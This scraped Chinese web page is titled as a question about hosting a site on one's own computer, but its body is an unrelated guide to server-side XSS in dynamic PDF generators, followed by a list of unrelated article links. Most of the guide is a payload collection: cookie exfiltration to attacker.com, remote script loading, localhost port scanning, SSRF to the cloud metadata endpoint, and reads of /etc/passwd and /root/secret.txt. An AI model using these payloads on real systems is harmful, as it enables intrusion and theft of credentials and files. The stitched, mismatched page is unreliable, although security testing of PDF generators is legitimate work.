当前位置: 首页 > news >正文

网站用自己的电脑做服务器怎么让别人看到自己做的网站

网站用自己的电脑做服务器,怎么让别人看到自己做的网站,龙岩市网站建设,网站开发为什么要用框架【Web漏洞指南】服务器端 XSS#xff08;动态 PDF#xff09; 概述流行的 PDF 生成工具常见攻击载荷 概述 如果一个网页使用用户控制的输入创建 PDF#xff0c;您可以尝试欺骗创建 PDF 的机器人以执行任意的 JS 代码。 因此#xff0c;如果PDF 创建机器人发现某种HTML标签… 【Web漏洞指南】服务器端 XSS动态 PDF 概述流行的 PDF 生成工具常见攻击载荷 概述 如果一个网页使用用户控制的输入创建 PDF您可以尝试欺骗创建 PDF 的机器人以执行任意的 JS 代码。 因此如果PDF 创建机器人发现某种HTML标签并且解释它们您可以滥用这种行为来引起服务器 XSS。 在常规利用中能够查看/下载创建的 PDF因此您将能够查看您通过 JS 编写的所有内容例如使用 document.write()。但是如果您无法看到创建的 PDF可能需要通过向您发出网络请求来提取信息盲人测试 流行的 PDF 生成工具 wkhtmltopdf 以其将 HTML 和 CSS 转换为 PDF 文档的能力而闻名TCPDF 在 PHP 生态系统中提供了一个强大的 PDF 生成解决方案对于在 Node.js 环境中工作的人PDFKit 提供了一个可行的选择。它使得可以直接从 HTML 和 CSS 生成 PDF 文档Java 开发人员可能更喜欢 iText这是一个库不仅有助于 PDF 创建还支持高级功能如数字签名和表单填充FPDF 是另一个 PHP 库以其简单性和易用性而著称 常见攻击载荷 1、测试XSS !-- 基本测试 -- img srcx onerrordocument.write(test) / scriptdocument.write(JSON.stringify(window.location))/script scriptdocument.write(iframe srcwindow.location.href/iframe)/script!-- 盲测 -- img srchttp://attacker.com/ img srcx onerrorlocation.hrefhttp://attacker.com/?c document.cookie scriptnew Image().srchttp://attacker.com/?cencodeURI(document.cookie);/script link relattachment hrefhttp://attacker.com2、SVG payload 一个访问Burpcollab子域的iframe和另一个访问元数据端点的iframe svg xmlns:xlinkhttp://www.w3.org/1999/xlink version1.1 classroot width800 height500 g foreignObject width800 height500 body xmlnshttp://www.w3.org/1999/xhtml iframe srchttp://redacted.burpcollaborator.net width800 height500/iframe iframe srchttp://169.254.169.254/latest/meta-data/ width800 height500/iframe /body /foreignObject /g /svgsvg width100% height100% viewBox0 0 100 100 xmlnshttp://www.w3.org/2000/svg circle cx50 cy50 r45 fill idfoo/ script typetext/javascript // ![CDATA[ alert(1); // ]] /script /svg更多SVG负载 https://github.com/allanlw/svg-cheatsheet 3、路径泄露 img srcx onerrordocument.write(window.location) / script document.write(window.location) /script4、加载外部脚本 利用这个漏洞的最佳方法是滥用漏洞使机器人加载您本地控制的脚本。然后您将能够在本地更改有效负载并使机器人每次都使用相同的代码加载它。 script srchttp://attacker.com/myscripts.js/script img srcxasdasdasd οnerrοrdocument.write(script srchttps://attacker.com/test.js/script)/5、机器人延迟 让机器人每 500 毫秒发送一次 ping 来检查机器人等待了多长时间 script let time 500; setInterval((){ let img document.createElement(img); img.src https://attacker.com/ping?time${time}ms; time 500; }, 500); /script img srchttps://attacker.com/delay6、端口扫描 script const checkPort (port) { fetch(http://localhost:${port}, { mode: no-cors }).then(() { let img document.createElement(img); img.src http://attacker.com/ping?port${port}; }); }for(let i0; i1000; i) { checkPort(i); } /script img srchttps://attacker.com/startingScan7、读取本地文件 / SSRF script xnew XMLHttpRequest; x.onloadfunction(){document.write(btoa(this.responseText))}; x.open(GET,file:///etc/passwd);x.send(); /scriptscript xhzeem new XMLHttpRequest(); xhzeem.onload function(){document.write(this.responseText);} xhzeem.onerror function(){document.write(failed!)} xhzeem.open(GET,file:///etc/passwd); xhzeem.send(); /scriptiframe srcfile:///etc/passwd/iframe img srcxasdasdasd onerrordocument.write(iframe srcfile:///etc/passwd/iframe)/ link relattachment hreffile:///root/secret.txt object datafile:///etc/passwd portal srcfile:///etc/passwd idportal embed srcfile:///etc/passwd width400 height400 styleiframe srcfile:///etc/passwd img srcx onerrordocument.write(iframe srcfile:///etc/passwd/iframe)/textwidth500height500 meta http-equivrefresh content0;urlfile:///etc/passwd /annotation file/etc/passwd content/etc/passwd iconGraph titleAttached File: /etc/passwd pos-x195 /
http://www.dnsts.com.cn/news/76468.html

相关文章:

  • 网站建设的费用结构包括网站提升收录
  • 网站备案营业执照哪个网站可以做简历
  • 北京天仪建设工程质量检测所网站Wordpress微博样式
  • 行政事业单位网站建设建议印记室内设计网站
  • 坪山模板网站建设公司郑州网站建设动态
  • 利用网站做蜘蛛池wordpress添加vip角色
  • 潮州网站网站建设网站的ftp管理权限是什么意思
  • 手机软件开发和网站开发合肥房产备案查询官网
  • 保险公司网站建设方案公司牌子设计图
  • 建设可以聊天的网站网站建设前期开发
  • 兴国做网站爬取wordpress文章
  • 柳州高端网站建设个人免费发布信息平台
  • 如何做旅游网站济南智能网站建设咨询电话
  • 如何把网站加入白名单举报网站建设工作总结
  • 网站开发浏览器兼容性网站设置地图
  • 绘画做动作的网站wordpress 开启手机
  • 山东省建设银行网站福州网站设计十年乐云seo
  • 网站盈利模式有哪几种杭州网站推广怎样做
  • 广州外贸网站建站重庆网站建设 吧
  • 大连模板网站制作服务网站格式图片
  • 临沂罗庄建设局网站建站宝盒v8破解版下载
  • 用网站快速免费建网站
  • 河池网站推广网站开发的论文
  • 广平网站建设投资5万的小型加工厂
  • 点击图片跳转到网站怎么做链接怎么管理网站数据库
  • 做网站哪里的服务器速度快青岛外贸网站设计
  • 上海快速建站平台如何选择网站建设公司
  • 网站被盗用广告营销的经典案例
  • 用返利网站做爆款国外网站推广公司
  • 如何在vps上搭建网站自学制作网站难不难